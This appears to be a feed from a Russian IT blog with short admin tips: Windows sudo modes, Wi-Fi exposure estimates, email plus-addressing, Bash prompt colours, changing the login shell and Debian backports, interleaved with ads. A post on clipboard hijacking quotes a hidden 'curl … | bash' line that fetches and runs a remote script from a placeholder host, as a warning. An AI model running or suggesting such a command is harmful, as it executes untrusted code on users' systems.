Записки IT специалиста

Как попасть в топ-10% вакансий? Научитесь писать вакансии, которые продают. Вебинар 17 июля — бесплатно, онлайн. Узнать больше #реклама 16+ choosyoffer.ru О рекламодателе

Sudo в Windows Мы ухе писали про это осенью прошлого года, но теперь уже официально в релизной версии Windows 11 есть sudo. Для его включения нужно перейти в Система – Для разработчиков и активировать одноименный пункт. Работает она точно также как ее Linux аналог, только вместо ввода пароля вам нужно подтвердить повышение прав UAC. Однако есть некоторые особенности ее использования. Утилита может работать в одном из трех режимов: 🔸 В новом окне (forceNewWindow) – это режим работы по умолчанию, в этом случае открывается новое окно с повышенными правами, в котором исполняется вызываемая нами команда. 🔸 Закрытые входные данные (disableInput) – в этом случае процесс с повышенными правами запускается в текущем окне, но он не может принимать на вход никакие данные из этого окна. Т.е. поток ввода для него будет заблокирован. Это сделано в целях безопасности, чтобы злонамеренные приложения, работающие без повышенных прав, не могли взаимодействовать с процессом, которому были повышены привилегии и передавать ему данные для выполнения. 🔸 Встроенный (normal) – этот режим наиболее похож на работу sudo в Linux, процесс с повышенными привилегиями запускается в том же окне и может получать на вход данные из этого окна, в т.ч. и от приложений с обычными правами. Режимы работы настраиваются там же где включается sudo - в настройках для разработчиков. 👆 Для Windows 10 утилиты нет и не планируется (что не удивительно, учитывая завершение жизненного цикла продукта).

Как меняются доходы ИТ-специалистов в 2025 году Исследование 2700 офферов от компаний из топ-500 РБК в ИТ-сфере показало: при смене работы доходы кандидатов на middle-уровне растут сильнее, чем у senior. А что еще изменилось? Эдуард Долгалев подготовил материал о том, что происходит с зарплатами айтишников. Подробнее - в нашей статье. #реклама О рекламодателе

Очередная находка в чулане Монитор Prestigio P1510, выглядит на сегодняшний день откровенно стремно. Диагональ 15 дюймов, 1024х768 и все такое прочее. Но когда-то это было… Это было ого-го! Год покупки примерно 2003 – 2004, я как раз ушел из бюджетки и начал нормально зарабатывать в коммерции. По тем временам это был «последний писк гавайской моды». Честные 15 дюймов, плоский, черный – это черный, компактный, сразу кучу места на рабочем столе освободилась. Ну и друзьям/подругам было что показать. Да и сам монитор был достаточно неплохой, под этим брендом к нам везли перемаркированные Hyundai Q15. Посмотрел я на него посмотрел. Да и оставил стоять на лестничной клетке, интересно, как долго он там простоит… Ну да может кому пригодится…

​​Насколько вреден Wi-Fi В комментариях был задан подобный вопрос, и он не является праздным, особенно если вы используете оборудование Mikrotik или альтернативные прошивки, скажем, OpenWRT, позволяющие поднять мощность передатчика выше разрешенного предела. Напомним, что законодательно установленное ограничения для Wi-Fi передатчиков это 100 мВт для диапазона 2,4 ГГц и 200 мВт для 5 ГГц. Данные ограничения накладываются на эквивалентную изотропно-излучаемую мощность (ЭИИМ), которая рассчитывается с учетом коэффициента усиления антенны. Следует понимать, что сама антенна является пассивным устройством и не может увеличивать мощность сигнала, но она перераспределяет излучение в пространстве таким образом, что уровень излучения в определенной точке пространства становится аналогичным излучению передатчика более высокой мощности. Если у нас есть передатчик с мощностью 20 дБм (100 мВт) и антенна с усилением 3 дБи, то ЭИИМ такой системы будет 200 мВт (23 дБм), для передатчика с мощностью 1 Вт ЭИИМ с такой антенной составит 2 Вт. Таким образом для оборудования имеющего мощность передатчика 1 Вт и антенну с усилением 3-4 дБи мы можем смело получить ЭИИМ 2 - 2,5 Вт. И такое оборудование есть, например, некоторые модели Mikrotik (подчеркнем – именно некоторые, не все). Закономерный вопрос- насколько это вредно. Мы нашли исследование Роспотребнадзора для домашних роутеров диапазона 2,4 ГГц, которое показало, что излучаемая ими мощность не превышает допустимой на любых расстояниях. Для оценки воздействия излучения на организм человека используется показатель плотности потока энергии (ППЭ), который измеряется в мкВт/см2, предельно допустимым уровнем (ПДУ) для граждан является 10 в мкВт/см2, для работников сферы связи – 18 в мкВт/см2. Максимальное значение ППЭ при котором допускается находиться без средств индивидуальной защиты – 1000 в мкВт/см2. Для расчета времени пребывания в местах с превышением ПДУ ППЭ существует еще один показатель - энергетическая экспозиция потока плотности энергии, предельное значение которой 200 мкВт/см2 в час. ❗️ Т.е. при значении ППЭ в 1000 в мкВт/см2 там можно находиться не более 12 минут. Все это хорошо, но как связать эти значения с мощностью роутера? Мы выполнили упрощенный расчет ППЭ, который показал цифры близкие к значениям полученным Роспотребнадзором и которые, на наш взгляд можно использовать для примерной оценки. На расстоянии 50 см и ближе ПДУ ППЭ превышают передатчики с мощностью от 300 мВт выше, но если отойти уже на метр, то превышение нормы будет только у передатчика в 2 Вт. 👉 Общее правило просто – ППЭ падает пропорционально квадрату расстояния от антенны передатчика и если не сидеть с ним в обнимку, то даже серьезно превышающие законодательные нормы передатчики не окажут на организм заметного вреда. При этом наша формула не учитывала наличия препятствий на пути сигнала, многолучевого распространения и отражений. На практике это может как снизить, так и увеличить ППЭ в конкретной точке пространства, но, в общем и целом, вычисления остаются справедливы.

Крупнейший университет искусственного интеллекта Приглашаем на бесплатный курс по искусственному интеллекту! Мы подготовили для тебя 5 занятий по теме «Разработка нейро-сотрудников на GPT». Пройди регистрацию для получения полного бесплатного доступа к курсу. ✨ 8 000+ студентов со всего мира ✨ 600+ AI-проектов, созданных студентами ✨ Сборная Университета — победители крупнейших AI-хакатонов России ✨ Стажировки в крупнейших компаниях России (РЖД, Ростелеком, РУДН, Совкомбанк, Самолет и другие) ✨ Трудоустраиваем выпускников в крупнейшие компании (Яндекс, ВТБ, Сбербанк, Роскосмос и другие) Будем рады видеть тебя в наших рядах! Узнать больше #реклама 16+ neural-university.ru О рекламодателе

Как быстро и бесплатно получить неограниченное количество виртуальных E-mail? Все очень просто. Многие почтовые сервера позволяют использовать следующую конструкцию:

myaddress+1234@example.com

При этом все, что после знака плюс адресом не считается, но передается в заголовках. Письмо же будет направлено на адрес:

myaddress@example.com

Таким образом без всяких настроек со стороны сервера вы можете получить неограниченное количество адресов ведущих на свой почтовый ящик. Для чего это нужно? Например, для тестирования, когда надо проверить тот же механизм регистрации. Или отследить кто сливает информацию. При регистрации на новом сайте просто добавьте через + новую метку. И если на этот адрес пойдет спам, то вы сразу будете знать кто слил. Еще один вариант использования, это указывать метки в адресе отправителя. Удобно когда много служб шлют отчеты, логи и т.п. через один и тот же технический ящик, Данную возможность поддерживают почтовые службы Яндекса, Майл.ру и Gmail. Outlook - нет.

Как устроен IT-бизнес изнутри — без иллюзий и прикрас Я — CTO и IT-консультант. Веду канал, где пишу о том, как действительно работают команды, технологии и IT-системы. Разбираю на конкретных кейсах: — Почему разваливаются проекты? — Что происходит внутри eCommerce и EdTech? — Как выстроить сильную команду и не сгореть? — Какие ошибки ИТ стоят вам денег? Если хотите разбираться глубже и видеть картину изнутри — подписывайтесь. Только полезное, без воды, продажи курсов и инфоцыганства. 👉 Авторский канал ИТ Директора

​​Неочевидные угрозы из буфера обмена Можно без преувеличения сказать - копипастить любят все, особенно длинные команды. Но не все задумываются о неочевидных угрозах данного метода. Дело в том, что в буфер обмена может попасть совсем не то, что вы видите на экране. Я думаю все сталкивались с подобным, когда вы копируете абзац, а в буфере к нему довеском оказывается:

 Информация с сайта https://example.com

Но это вполне безобидная штука, а ведь вместо обычной и безобидной apt update В буфере может оказаться: curl -s https://example.com/script.sh | bash Да еще и с символом переноса строки в конце, что автоматически запустит команду на выполнение сразу же после вставки. А дальше, пока вы будете смотреть в экран и пытаться понять что происходит, произойти может всякое. И это не страшилки, а вполне реальный сценарий, который применялся на практике для заражения систем вредоносным ПО. Какой отсюда вывод? Не копипастить? Ну это не реально. А вот не тянуть сразу из браузера в терминал - это вполне по силам, чтобы понять что именно вы скопировали достаточно вставить содержимое буфера в любой текстовый редактор.

Битрикс24 CRM с искусственным интеллектом Читайте в 6 карточках про реальные ускорители продаж с ИИ. ✨А умную CRM забирайте по ссылке Зарегистрироваться #реклама 16+ bitrix24.ru О рекламодателе

Очередное прибавление в коллекции Вчера в нашу коллекцию попал новый интересный экземпляр - Celeron D 320, сам процессор, с большой вероятностью, живой. Но проверить его не на чем, поэтому пусть пополняет ряды. Чем интересна именно эта модель? Во-первых, это последний Celeron для Socket 478, все следующие модели выпускались уже для LGA 775. Напомним, что Socket 478 – это последний разъем Intel подразумевающий наличие у процессора ножек, насчет которых по выходу LGA 775 было сломано немало копий. Во-вторых, это первая «номерная» серия процессоров Celeron, хотя сам процессор оформлен еще в «старом» стиле. На время его выпуска – 2 квартал 2004 года – как раз пришелся закат эпохи «гонки гигагерцев». Если до этого производительность процессора прямо зависела от его тактовой частоты, то по мере роста частот начали проявляться физические ограничения, делающие дальнейший такой рост невозможным, во всяком случае на уровне текущего технологического процесса. Наступала новая эпоха – многоядерности и перехода на 64-битные вычисления. Но все это было еще впереди, а пока частота как однозначный критерий оценки производительности себя изжила и понадобились новые подходы. Первыми на этой стезе были процессоры от AMD, которые при более низких рабочих частотах использовали более высокие индексы, намекая на уровне каких процессоров Intel находится их производительность. Но Intel решил полностью отказаться от привязки к частотам и ввести некие сторонние индексы, по принципу больше -лучше. Таким образом данный процессор получил наименование Celeron D 320, хотя на крышке все оставалось по-старому и мы можем видеть там тактовую частоту, размер кеша и частоту шины. Но это еще не все. Все Celeron на базе Pentium 4 (ядра Willamette и Northwood) были очень сильно урезанными (кеш 128 КБ и шина 400 МГц), что делало их практически беспомощными по сравнению с конкурентами. Действительно, эти «камни» влегкую обходили не только сравнимые по цене процессоры AMD, но и свои же собраться из семейства Pentium III на ядре Tualatin с гораздо более скромными тактовыми частотами. Новый Celeron наконец получил вполне конкурентное ядро Prescott, 256 КБ кеша L2 и шину 533 МГц, что сделало его очень привлекательным в своем сегменте, с учетом того, что стоимость процессоров осталась на прежнем уровне. Вот такая интересная история стоит за этим небольшим, по сегодняшним меркам, процессором. Можно сказать – целая эпоха. А казалось, что это было только вчера…

🎮 Как защитить свой digital-продукт? Наткнулись на интересный вебинар от Futura Digital, которая специализируется на защите интеллектуальной собственности и digital-праве для IT компаний зарубежом. Тема особенно актуальна для тех, кто работает с digital-продуктами и брендами. 👨‍🚀 “Битва за названия и образы: зачем IT/GameDev компаниям товарные знаки?” 📌 О чём вебинар: — Почему авторское право не всегда вас защитит; — Почему даже Google нельзя без товарного знака; — Как компания 5 лет сражалась с недобросовестным конкурентом; — И как связаны Moschino и Sims. Кому будет полезно: — GameDev и Digital-компаниям — Стартапам и продакт-тимам — IT-основателям, CPO и юристам — Всем, кто выводит продукт на рынок и хочет избежать проблем с брендом Спикеры: — Александра Курдюмова, Co-Founder, старший партнёр — Екатерина Ковалева, старший юрист IP-практики — Анна Ющенко, юрист IP-практики 📅 9 июля, 16:00 (Дубай) 🔗 Регистрация – https://forms.gle/UBY3jQ1cXFyYFbFx5 Берите на заметку канал Futura Digital — особенно если вы работаете на международных рынках и хотите держать руку на пульсе в вопросах IP, брендов и legal-tech. #реклама О рекламодателе

​​Настраиваем цвета строки приглашения Bash Часто встречающейся проблемой при работе с командной строкой в оболочке Bash является ее низкая информативность, не всегда можно сразу понять под каким пользователем мы работаем. На локальной или удаленной машине находимся. Чтобы повысить информативность строки приглашения можно изменить цвет строки приглашения, например, выделив root красным цветом или выделив имя локальной системы цветом отличным от удаленных. За формат строки приглашения отвечает переменная окружения PS1 и по умолчанию она имеет значение:

PS1='\u@\h:\w\$ '

Где u – имя пользователя, h – имя хоста, w – текущий путь, а $ - символ приглашения. В результате строка будет выглядеть так:

user@host:/home/user$

Для изменения внешнего вида нам доступны три параметра: формат символов, цвет текста и цвет фона. Формат может принимать три значения: ▫️Нормальный текст – 0 ▫️Жирный текст – 1 ▫️Подчеркнутый текст – 4 Цвета текста / фона: ▫️Черный 30/40 ▫️Красный 31/41 ▫️Зеленый 32/42 ▫️Желтый 33/43 ▫️Голубой 34/44 ▫️Фиолетовый 35/45 ▫️Бирюзовый 36/46 ▫️Белый 37/47 Для того чтобы задать цвет отдельных элементов применяется специальное форматирование, использующее символы \e в начале и m в конце. Например, выделим имя пользователя и хост зеленым цветом, а путь сделаем синим, при этом двоеточие и символ приглашение раскрашивать не будем:

PS1='\[\e[01;32m\]\u@\h\[\e[m\]:\[\e[01;34m\]\w\[\e[m\]\$ '

Сам цвет задает конструкция:

\[\e[01;32m\] 

Формат текста задает 01, а его цвет – 32, т.е. жирный зеленый. Если мы хотим еще изменить фон, то добавляем туда еще одно значение:

\[\e[01;32;43m\] 

В нашем случае добавили еще желтый фон. В каком порядке перечислять параметры не имеет значения, так как они отличаются для разных элементов. Конструкция

\[\e[m\]

Сбрасывает цвет и формат элементов на дефолтные. Так, например, если мы уберем такую конструкцию перед двоеточием, то оно тоже окрасится в заданный перед этим цвет:

PS1='\[\e[01;32m\]\u@\h:\[\e[01;34m\]\w\[\e[m\]\$ '

Проверить что получилось можно сразу, введя указанную строку в консоль и нажав Enter. Таким образом можно тонко настроить цвета в соответствии со своими потребностями. Если же вы люто накосячили, то не отчаивайтесь, введите

PS1='\u@\h:\w\$ '

И все снова станет как было. Либо просто выйдите из консоли. Чтобы выбранное вами оформление автоматически применялось при входе в систему добавьте полученную строку в файл .bashrc выбранного пользователя.

Онлайн-магистратура с IT специальностями от Яндекса Совместно с ИТМО, МИФИ, МФТИ. Онлайн-магистратура с актуальными программами и гибким графиком обучения. Получите высокооплачиваемую IT профессию, официальный диплом и практические знания. Господдержка оплаты. Совмещение с работой! Подать заявку #реклама 16+ О рекламодателе

​​Как изменить командную оболочку Linux Командная оболочка, она же интерпретатор командной строки – специальная программа, запускаемая при входе в систему и обеспечивающая для пользователя интерфейс командной строки. Самой распространенной и популярной командной оболочкой в Linux является bash, но существуют и другие оболочки. Начинающие пользователи редко задумываются над этим, до тех пор, пока не попадут в непонятную ситуацию. Сегодня за советом обратился молодой коллега, он решил потренироваться в настройке веб-сервера и взял для этих целей бесплатную виртуалку у Cloud.ru о котором мы недавно писали. Его «проблема» оказалась в том, что Linux там (а он установил Debian 12) какой-то непонятный, выглядит не так, стрелки не работают и вообще странно себя ведет. Он уже и систему переустановил, но ничего не помогает. Любой опытный администратор Linux сразу же распознает симптомы и спросит какая командная оболочка установлена для пользователя. Проверить это можно командной:

echo $SHELL

В нашем случае ожидаемо получили ответ:

/bin/sh

В Debian и Ubuntu данный файл является символической ссылкой на dash – минималистическую оболочку Debian Almquist shell портированную Almquist shell (ash) из NetBSD. Она очень легковесна, но не может похвастаться функциональностью и не является полностью POSIX-совместимой. Вполне понятно, что, оказавшись в непривычной командной среде мой коллега растерялся и не сразу понял в чем дело. Но этому горю легко помочь и установить в качестве командного интерпретатора привычный bash или что угодно другое. Прежде всего ознакомимся со списком доступных командных оболочек:

cat /etc/shells

В выводе вы получите что-то вроде:

/bin/sh
/bin/bash
/usr/bin/bash
/bin/rbash
/usr/bin/rbash
/bin/dash
/usr/bin/dash

Ничего иного в качестве командной оболочки указывать не следует иначе вы просто не сможете войти в систему. Опытный пользователь заметит, что для многих оболочек присутствует два пути, ничего удивительного в этом нет, так как в современных системах каталог /bin является символической ссылкой на /usr/bin и обе записи ведут в одно и тоже место. Чтобы изменить командную оболочку используйте команду:

chsh -s /bin/bash 

В данном случае мы установили себе оболочку bash. Обычный пользователь может изменить оболочку только себе, суперпользователь может сделать это для любого пользователя, например:

chsh -s /bin/bash user1

В данном случае указанная оболочка будет установлена пользователю user1. Чтобы изменения вступили в силу нужно выйти и войти обратно в систему.

Летний лагерь по Ansible 📚 Мы научим вас работать с Ansible, чтобы вы смогли настроить автоматизацию, упростить командную работу, масштабировать в одно касание и экономить время. Это не просто курс, а интерактивный летний лагерь. В нем вас ждет не только освоение Ansible, но и: 🔸 разбор реальных кейсов из вашей работы; 🔸 обмен опытом с единомышленниками в нетворкинг-чате; 🔸 сореванования с другими участниками; 🔸 истории спикеров курса об их рабочих факапах и о том, как они их решали. Доп. бонус к программе: мощный технический воркшоп «Использование ИИ в работе» с экспертом 🎁 Запускаем только один поток обучения в подобном формате. Старт 21 июля. Успевайте! Все подробности тут ⬅️

Летний лагерь по Ansible 📚 Мы научим вас работать с Ansible, чтобы вы смогли настроить автоматизацию, упростить командную работу, масштабировать в одно касание и экономить время. Это не просто курс, а интерактивный летний лагерь. В нем вас ждет не только освоение Ansible, но и: 🔸 разбор реальных кейсов из вашей работы; 🔸 обмен опытом с единомышленниками в нетворкинг-чате; 🔸 сореванования с другими участниками; 🔸 истории спикеров курса об их рабочих факапах и о том, как они их решали. Доп. бонус к программе: мощный технический воркшоп «Использование ИИ в работе» с экспертом 🎁 Запускаем только один поток обучения в подобном формате. Старт 21 июля. Успевайте! Все подробности тут ⬅️

​​Некоторые особенности поддержки репозитория Backports в Debian и Ubuntu Репозиторий Backports известен, пожалуй, каждому пользователю указанных систем. Он позволяет, при необходимости, устанавливать более свежие версии программ, не жертвуя общей стабильностью системы. Не следует путать этот репозиторий с процессом бекпортирования новых функций и улучшений в основной дистрибутив. Это разные вещи. Давайте немного разберем этот вопрос. Любой стабильный дистрибутив (в нашем случае Debian или Ubuntu LTS) ставит в основу стабильность окружения на протяжении всего срока поддержки. Это означает, что один раз настроив систему вы можете смело обновлять ее на протяжении всего срока поддержки не опасаясь, что обновления сломают всю логику работы системы. Пакетная база стабильного дистрибутива замораживается незадолго до момента релиза и в дальнейшем все обновления пакетов сводятся к исправлениям и незначительным улучшениями, которые не меняют поведение пакета и не ломают обратную совместимость. Реальный подход к этому вопросу зависит от дистрибутива, так в Debian в обновления попадают только незначительные улучшения, не меняющие основную функциональность и поведение пакета. В Ubuntu подход более демократичный, если обновления не ломают обратную совместимость, то они будут добавлены в основной дистрибутив. Но как быть если обновление пакета несет новую функциональность? Или его вообще не было на момент выпуска дистрибутива? А вот как раз для этого и есть репозиторий Backports. С его помощью мы можем установить в текущий дистрибутив совершенно новые программы либо существенно обновленные версии старых, не подвергая угрозам его стабильность. Это же хорошо? Да. Но с оговорками. Вернемся к теме поддержки. У Debian это 3 + 2, когда первые три года дистрибутив получает поддержку в полном объеме от команды Debian, а последующие два года от сообщества LTS. При этом репозиторий Backports, который является частью дистрибутива, не входит в список поддерживаемых сообществом LTS. Таким образом поддержка всего того, что вы установили из Backports заканчивается через три года, после чего вы не будете получать для этих пакетов ничего, включая обновления безопасности и исправления критических багов. В Ubuntu поддержка дистрибутива, включая репозиторий Backports осуществляется на протяжении 5 лет. И мы снова не будем делать никаких выводов и рекомендаций. Как говориться, информация к размышлению.

Современная магистратура от Центрального университета Хочешь развиваться в сфере ИТ и получить фундаментальные знания с практикой? Поступай в магистратуру Центрального университета! - 4 офлайн программы по востребованным направлениям ИТ - Онлайн-программа по машинному обучению - 300 мест с грантами до 1,2 млн руб. - Вечерние занятия и учеба по выходным — удобно совмещать с работой - Обучение по модели STEM-образования: на стыке науки, технологий и бизнеса - Возможность стажировок и трудоустройства в ведущих компаниях - Государственный диплом за 2 года Магистратура в Центральном университете — это современный подход к образованию, сильный преподавательский состав и актуальные кейсы от индустрии. Оставляй заявку на грант уже сейчас! Подать заявку #реклама 16+ apply.centraluniversity.ru О рекламодателе